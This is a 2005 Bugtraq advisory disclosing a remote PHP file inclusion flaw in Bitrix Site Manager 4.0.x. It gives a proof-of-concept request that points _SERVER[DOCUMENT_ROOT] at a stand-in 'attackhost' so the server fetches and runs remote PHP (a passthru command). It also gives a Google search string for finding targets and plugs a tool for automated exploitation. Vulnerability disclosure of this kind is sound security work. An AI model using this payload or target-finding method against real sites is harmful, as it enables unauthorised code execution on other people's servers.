[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Vulnerability: Bitrix Php inclusion
From:       D_BuG <d_bug () bk ! ru>
Date:       2005-06-15 13:58:11
Message-ID: 332659547.20050615175811 () bk ! ru
[Download RAW message or body]

Vendor: Bitrix
Product: Bitrix Site Manager 4.0.x

Vulnerability: php including.
Consequence: custom php code execution on server
Risk: Critical

Description:
Due to unfiltered _SERVER[DOCUMENT_ROOT] variable in file \
“\bitrix\modules\main\start.php”, hacker can upload php script from other server and \
execute custom php code on webserver Send transaction to the server.

Script Example:
<?php
passthru('ls -la');
?>

Transaction should look like \
http://vilcum/bitrix/admin/index.php?_SERVER[DOCUMENT_ROOT]=http://attackhost/ \
“attackhost” server should contain dbconn.php script in /bitrix/php_interface/ , that \
should be executet on the target server.

Google search: inurl: /bitrix/

Discoveried By D_BuG d_bug@bk.ru
NemesisSecurityTeam
http://nemesisoftware.com/

CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerabilities search (Google Hacking \
technique) and usage.

-- 
Best regards,
 D_BuG                          mailto:d_bug@bk.ru


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic